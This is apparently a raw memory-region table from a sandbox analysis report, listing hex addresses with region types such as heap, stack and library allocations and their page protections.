48ED000
|
stack
|
page read and write
|
||
23420000
|
trusted library allocation
|
page read and write
|
||
714F000
|
heap
|
page read and write
|
||
49D1000
|
trusted library allocation
|
page read and write
|
||
2029D000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EF367E000
|
stack
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
2C51000
|
remote allocation
|
page execute and read and write
|
||
660000
|
heap
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
2154C000
|
trusted library allocation
|
page read and write
|
||
204CA000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
25204710000
|
trusted library allocation
|
page read and write
|
||
8D31000
|
direct allocation
|
page execute and read and write
|
||
7FE000
|
stack
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
190000
|
trusted library allocation
|
page read and write
|
||
20309000
|
trusted library allocation
|
page read and write
|
||
21564000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
8310000
|
trusted library allocation
|
page read and write
|
||
460000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2704000
|
heap
|
page read and write
|
||
3EE0000
|
direct allocation
|
page read and write
|
||
25204441000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
2131E000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
486C000
|
stack
|
page read and write
|
||
20359000
|
trusted library allocation
|
page read and write
|
||
204F3000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
170000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
235B0000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
419A000
|
heap
|
page read and write
|
||
25204487000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
9D0000
|
trusted library allocation
|
page read and write
|
||
492000
|
heap
|
page read and write
|
||
49B0000
|
direct allocation
|
page read and write
|
||
3170000
|
heap
|
page read and write
|
||
202C3000
|
trusted library allocation
|
page read and write
|
||
235E0000
|
trusted library allocation
|
page execute and read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
2527EEFF000
|
heap
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23440000
|
trusted library allocation
|
page read and write
|
||
234E0000
|
trusted library allocation
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
204A8000
|
trusted library allocation
|
page read and write
|
||
25200340000
|
trusted library allocation
|
page read and write
|
||
20C4000
|
heap
|
page read and write
|
||
730000
|
trusted library section
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
20405000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
AC8000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
6F60000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23480000
|
trusted library allocation
|
page execute and read and write
|
||
4BE000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
21279000
|
trusted library allocation
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2527F700000
|
heap
|
page read and write
|
||
CE8000
|
trusted library allocation
|
page read and write
|
||
2527EEAE000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20553000
|
trusted library allocation
|
page read and write
|
||
203D2000
|
trusted library allocation
|
page read and write
|
||
94000
|
trusted library allocation
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
235A0000
|
trusted library allocation
|
page read and write
|
||
25204600000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
41C3000
|
heap
|
page read and write
|
||
22399000
|
heap
|
page read and write
|
||
7EF1CF9000
|
stack
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
23590000
|
trusted library allocation
|
page read and write
|
||
7EF1DFE000
|
unkown
|
page readonly
|
||
235F0000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EAE000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
6A20000
|
direct allocation
|
page read and write
|
||
7210000
|
trusted library allocation
|
page read and write
|
||
204B8000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
3680000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
23480000
|
trusted library allocation
|
page read and write
|
||
252044F4000
|
heap
|
page read and write
|
||
3D30000
|
heap
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
9FA000
|
trusted library allocation
|
page execute and read and write
|
||
20585000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
trusted library allocation
|
page read and write
|
||
A90000
|
heap
|
page read and write
|
||
93000
|
trusted library allocation
|
page execute and read and write
|
||
22DBF000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2058E000
|
trusted library allocation
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
2527F75A000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
222F0000
|
heap
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
229E1000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
6FD0000
|
trusted library allocation
|
page read and write
|
||
454000
|
unkown
|
page readonly
|
||
2527F010000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
202F9000
|
trusted library allocation
|
page read and write
|
||
20583000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
2527FF80000
|
trusted library section
|
page readonly
|
||
4A7000
|
heap
|
page read and write
|
||
4180000
|
heap
|
page read and write
|
||
21502000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
204A3000
|
trusted library allocation
|
page read and write
|
||
212B7000
|
trusted library allocation
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
49A0000
|
direct allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2232F000
|
heap
|
page read and write
|
||
5B75000
|
trusted library allocation
|
page read and write
|
||
4149000
|
heap
|
page read and write
|
||
2161C000
|
trusted library allocation
|
page read and write
|
||
B2000
|
trusted library allocation
|
page read and write
|
||
72A0000
|
trusted library allocation
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
246E000
|
stack
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
492000
|
heap
|
page read and write
|
||
70AE000
|
stack
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
454000
|
unkown
|
page readonly
|
||
72E0000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
21569000
|
trusted library allocation
|
page read and write
|
||
812A000
|
heap
|
page read and write
|
||
23600000
|
trusted library allocation
|
page read and write
|
||
20407000
|
trusted library allocation
|
page read and write
|
||
21506000
|
trusted library allocation
|
page read and write
|
||
7B9000
|
heap
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
235D0000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EF2C7E000
|
unkown
|
page readonly
|
||
49E000
|
heap
|
page read and write
|
||
25204502000
|
heap
|
page read and write
|
||
44AD000
|
stack
|
page read and write
|
||
21319000
|
trusted library allocation
|
page read and write
|
||
44E0000
|
heap
|
page read and write
|
||
7EF297E000
|
stack
|
page read and write
|
||
1FD4E000
|
stack
|
page read and write
|
||
2527F600000
|
heap
|
page read and write
|
||
CB000
|
trusted library allocation
|
page execute and read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
202F5000
|
trusted library allocation
|
page read and write
|
||
1FEF7000
|
stack
|
page read and write
|
||
44E7000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
9E9000
|
trusted library allocation
|
page read and write
|
||
25204462000
|
heap
|
page read and write
|
||
7CE0000
|
heap
|
page read and write
|
||
235B0000
|
trusted library allocation
|
page read and write
|
||
235A0000
|
trusted library allocation
|
page read and write
|
||
2527EEB2000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
214C5000
|
trusted library allocation
|
page read and write
|
||
4F74000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7270000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
9D3000
|
trusted library allocation
|
page execute and read and write
|
||
1FF30000
|
heap
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
2527FFD1000
|
trusted library allocation
|
page read and write
|
||
2527F580000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
70ED000
|
stack
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
2527EE8E000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
8B80000
|
trusted library allocation
|
page execute and read and write
|
||
252044F2000
|
heap
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
22B5E000
|
stack
|
page read and write
|
||
72F0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
22420000
|
heap
|
page read and write
|
||
204FE000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
252044EB000
|
heap
|
page read and write
|
||
20211000
|
trusted library allocation
|
page read and write
|
||
2030D000
|
trusted library allocation
|
page read and write
|
||
21333000
|
trusted library allocation
|
page read and write
|
||
4BB000
|
heap
|
page read and write
|
||
3AC000
|
stack
|
page read and write
|
||
2527EF13000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
1FA10000
|
heap
|
page read and write
|
||
25AE000
|
stack
|
page read and write
|
||
4020000
|
direct allocation
|
page read and write
|
||
202ED000
|
trusted library allocation
|
page read and write
|
||
1FD8F000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2527EE9F000
|
heap
|
page read and write
|
||
4010000
|
direct allocation
|
page read and write
|
||
6E51000
|
heap
|
page read and write
|
||
40D0000
|
heap
|
page read and write
|
||
449E000
|
stack
|
page read and write
|
||
48AE000
|
stack
|
page read and write
|
||
214B0000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
25204720000
|
trusted library allocation
|
page read and write
|
||
1F8CD000
|
stack
|
page read and write
|
||
454000
|
unkown
|
page readonly
|
||
21537000
|
trusted library allocation
|
page read and write
|
||
203FF000
|
trusted library allocation
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
5BF0000
|
heap
|
page read and write
|
||
4149000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
1FD10000
|
remote allocation
|
page read and write
|
||
1FA0F000
|
stack
|
page read and write
|
||
2520450A000
|
heap
|
page read and write
|
||
202A9000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
2527EE00000
|
heap
|
page read and write
|
||
49C0000
|
heap
|
page read and write
|
||
212E5000
|
trusted library allocation
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
7250000
|
trusted library allocation
|
page read and write
|
||
20305000
|
trusted library allocation
|
page read and write
|
||
7EF15F7000
|
stack
|
page read and write
|
||
229E1000
|
heap
|
page read and write
|
||
2527FFB0000
|
trusted library section
|
page readonly
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
70A00000
|
unkown
|
page readonly
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
234E0000
|
trusted library allocation
|
page execute and read and write
|
||
201F6000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
223F4000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
7BF000
|
stack
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
7EF2DFB000
|
stack
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FF21000
|
trusted library allocation
|
page read and write
|
||
1FDA0000
|
direct allocation
|
page read and write
|
||
20580000
|
trusted library allocation
|
page read and write
|
||
7EF20FB000
|
stack
|
page read and write
|
||
235B0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
3EB0000
|
direct allocation
|
page read and write
|
||
71D6000
|
heap
|
page read and write
|
||
22410000
|
trusted library allocation
|
page execute and read and write
|
||
8FF000
|
stack
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
270D000
|
heap
|
page read and write
|
||
21572000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
8000000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
412E000
|
heap
|
page read and write
|
||
2130F000
|
trusted library allocation
|
page read and write
|
||
7EF19FE000
|
unkown
|
page readonly
|
||
2527F71A000
|
heap
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
21314000
|
trusted library allocation
|
page read and write
|
||
252044C7000
|
heap
|
page read and write
|
||
B0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
4960000
|
direct allocation
|
page read and write
|
||
22EBE000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
2527EE90000
|
heap
|
page read and write
|
||
7E05000
|
trusted library allocation
|
page read and write
|
||
2159E000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
81F4000
|
heap
|
page read and write
|
||
1FD10000
|
remote allocation
|
page read and write
|
||
7EF2FFB000
|
stack
|
page read and write
|
||
204C6000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
25204770000
|
remote allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
2057A000
|
trusted library allocation
|
page read and write
|
||
9B0000
|
trusted library section
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
23490000
|
trusted library allocation
|
page execute and read and write
|
||
374C000
|
stack
|
page read and write
|
||
23430000
|
trusted library allocation
|
page read and write
|
||
C7000
|
trusted library allocation
|
page execute and read and write
|
||
2251000
|
remote allocation
|
page execute and read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
1FF10000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
7EF1AFC000
|
stack
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
22B1D000
|
stack
|
page read and write
|
||
81EA000
|
heap
|
page read and write
|
||
7EF2CFE000
|
unkown
|
page readonly
|
||
7EF18FE000
|
stack
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
468000
|
heap
|
page read and write
|
||
8101000
|
heap
|
page read and write
|
||
7EF23FE000
|
unkown
|
page readonly
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
3ED0000
|
direct allocation
|
page read and write
|
||
2703000
|
heap
|
page read and write
|
||
7EF2AFE000
|
stack
|
page read and write
|
||
3F07000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
21309000
|
trusted library allocation
|
page read and write
|
||
25204513000
|
heap
|
page read and write
|
||
70A02000
|
unkown
|
page readonly
|
||
22379000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
25204500000
|
heap
|
page read and write
|
||
234A0000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
2240D000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
4146000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
1F68E000
|
stack
|
page read and write
|
||
98E000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2527EEBD000
|
heap
|
page read and write
|
||
2527F590000
|
trusted library section
|
page read and write
|
||
1F7CD000
|
stack
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
7EF24FE000
|
unkown
|
page readonly
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
9DD000
|
trusted library allocation
|
page execute and read and write
|
||
2520442E000
|
heap
|
page read and write
|
||
446F000
|
stack
|
page read and write
|
||
AB31000
|
direct allocation
|
page execute and read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
19A000
|
stack
|
page read and write
|
||
8500000
|
trusted library allocation
|
page execute and read and write
|
||
7230000
|
trusted library allocation
|
page read and write
|
||
201FB000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
4420000
|
heap
|
page execute and read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
223F0000
|
trusted library allocation
|
page read and write
|
||
1FF00000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
16C0000
|
remote allocation
|
page execute and read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
1F78E000
|
stack
|
page read and write
|
||
20216000
|
trusted library allocation
|
page read and write
|
||
2527EEA6000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
20058000
|
trusted library allocation
|
page read and write
|
||
214D8000
|
trusted library allocation
|
page read and write
|
||
22A13000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
90000
|
trusted library allocation
|
page read and write
|
||
2020E000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
235C0000
|
trusted library allocation
|
page read and write
|
||
2342F000
|
trusted library allocation
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
7DA0000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
25204421000
|
heap
|
page read and write
|
||
70A04000
|
unkown
|
page readonly
|
||
201F0000
|
trusted library allocation
|
page read and write
|
||
7EF1BFE000
|
unkown
|
page readonly
|
||
4970000
|
direct allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
22F3F000
|
stack
|
page read and write
|
||
252046B0000
|
trusted library allocation
|
page read and write
|
||
7EF22FE000
|
unkown
|
page readonly
|
||
3EC0000
|
direct allocation
|
page read and write
|
||
2702000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
4BE000
|
heap
|
page read and write
|
||
23410000
|
trusted library allocation
|
page execute and read and write
|
||
8270000
|
trusted library allocation
|
page execute and read and write
|
||
7FD28000
|
trusted library allocation
|
page execute and read and write
|
||
4050000
|
direct allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
7FF0000
|
trusted library allocation
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2155F000
|
trusted library allocation
|
page read and write
|
||
702E000
|
stack
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
234B0000
|
trusted library allocation
|
page execute and read and write
|
||
2F5E000
|
stack
|
page read and write
|
||
8260000
|
trusted library allocation
|
page execute and read and write
|
||
223FA000
|
trusted library allocation
|
page read and write
|
||
252043E0000
|
trusted library allocation
|
page read and write
|
||
4B5000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
6AD000
|
stack
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
6FE0000
|
heap
|
page execute and read and write
|
||
A0000
|
trusted library allocation
|
page read and write
|
||
8300000
|
trusted library allocation
|
page read and write
|
||
81CA000
|
heap
|
page read and write
|
||
7DA000
|
heap
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
71E1000
|
heap
|
page read and write
|
||
A05000
|
trusted library allocation
|
page execute and read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
7EF16FE000
|
unkown
|
page readonly
|
||
C5000
|
trusted library allocation
|
page execute and read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|
||
49E000
|
heap
|
page read and write
|
||
252044C5000
|
heap
|
page read and write
|
||
22400000
|
trusted library allocation
|
page read and write
|
||
25204600000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
69E0000
|
direct allocation
|
page read and write
|
||
234F0000
|
trusted library allocation
|
page read and write
|
||
21522000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
2323F000
|
stack
|
page read and write
|
||
7260000
|
trusted library allocation
|
page read and write
|
||
22B60000
|
trusted library allocation
|
page read and write
|
||
4143000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
4080000
|
direct allocation
|
page read and write
|
||
4146000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
234D0000
|
trusted library allocation
|
page read and write
|
||
22382000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
806C000
|
heap
|
page read and write
|
||
821000
|
heap
|
page read and write
|
||
4A3000
|
heap
|
page read and write
|
||
1FF20000
|
trusted library allocation
|
page read and write
|
||
1FCBF000
|
stack
|
page read and write
|
||
252043E1000
|
trusted library allocation
|
page read and write
|
||
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
2527FFC0000
|
trusted library section
|
page readonly
|
||
2700000
|
heap
|
page read and write
|
||
7CD5000
|
stack
|
page read and write
|
||
8064000
|
heap
|
page read and write
|
||
23470000
|
trusted library allocation
|
page read and write
|
||
26AF000
|
stack
|
page read and write
|
||
203DC000
|
trusted library allocation
|
page read and write
|
||
20230000
|
trusted library allocation
|
page read and write
|